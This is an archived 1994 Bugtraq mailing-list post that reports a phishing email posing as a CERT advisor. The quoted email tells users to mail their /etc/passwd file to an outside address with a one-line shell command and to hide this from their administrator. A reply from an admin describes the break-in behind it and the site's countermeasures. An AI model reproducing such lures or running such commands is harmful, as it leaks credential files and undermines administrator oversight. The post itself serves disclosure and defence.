Bugtraq mailing list archives

Re: Another request for passwords

From: chowes () helix net (Charles Howes)
Date: Sun, 23 Oct 1994 04:17:40 -0700 (PDT)


On Sun, 23 Oct 1994, Douglas R. Floyd wrote:

I got this in the mail today (10-23).

Seems like someone is knocking on io.com now.

(The forward to paris is normal as mail gets forwarded there.)

BEGIN FUNKY MESSAGE --------

From vanepp () sfu ca  Sun Oct 23 00:00:56 1994

Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
(931110.SGI/930416.SGI.AUTO)
        for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
Received: from trance.helix.net
        by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
        id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
From: vanepp () sfu ca
Received: from  (helix.net [142.231.37.2]) by trance.helix.net
(8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
dfloyd () pentagon io com; Sat, 22 Oct 1994 21:33:23 -0700
Message-Id: <199410230433.VAA07859 () trance helix net>
Date: Sat, 22 Oct 1994 14:22:25
To: dfloyd () pentagon io com
Subject: Very Important
Status: RO

Dear user,

    It is imperative that I attain your /etc/passwd file
immediately.  It is for security reasons.  You can mail
it to me by typing:

            mail vanepp () sfu ca < /etc/passwd

Do not tell your system administrator.  I am
conducting an investigation on your system.  Thank you

Your identity will be kept confidential.  I guarantee it

Thank you for your cooperation.

Peter Van Epp      Technical Systems Operations
                   CERT Security Advisor
                   vanepp () sfu ca


END FUNKY MESSAGE -----

I send cert () cert org a copy, as well as the admins at io.com.

I know this was posted earlier, but I think this is another address,
possibly an MX record as I could not telnet or finger sfu.ca.



Hi.

Yes, someone broke into an account here at Helix, and seems to have a
grudge against one or more people.  Vanepp in particular.

Argh.  This is the third mailbomb.  I'm supposed to be in charge of
security; how do you protect against this??!?

We're using shadow passwords as of tonight, and tcp wrappers as of
last month.  The bugger keeps signing on via modem, and this is a
problem.  We can't afford callerid.

--
Charles Howes -- chowes () helix net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971

Current thread:

Another request for passwords Douglas R. Floyd (Oct 22)
- Re: Another request for passwords Charles Howes (Oct 23)
- Re: Another request for passwords That Whispering Wolf... (Oct 23)
  - Re: Another request for passwords Charles Howes (Oct 23)
    - Re: Another request for passwords christopher williams (Oct 24)
    - Re: Another request for passwords Brett Watson (Oct 25)
- Stupid crackers exploiting stupid users der Mouse (Oct 23)
  - Re: Stupid crackers exploiting stupid users Peter Van Epp (Oct 23)
  - Re: Stupid crackers exploiting stupid users Charles Howes (Oct 23)
    - Re: Stupid crackers exploiting stupid users pluvius (Oct 25)
    - Re: Stupid crackers exploiting stupid users Charles Howes (Oct 26)
    - Sun Mouse Bug David J. Bianco (Oct 26)

(Thread continues...)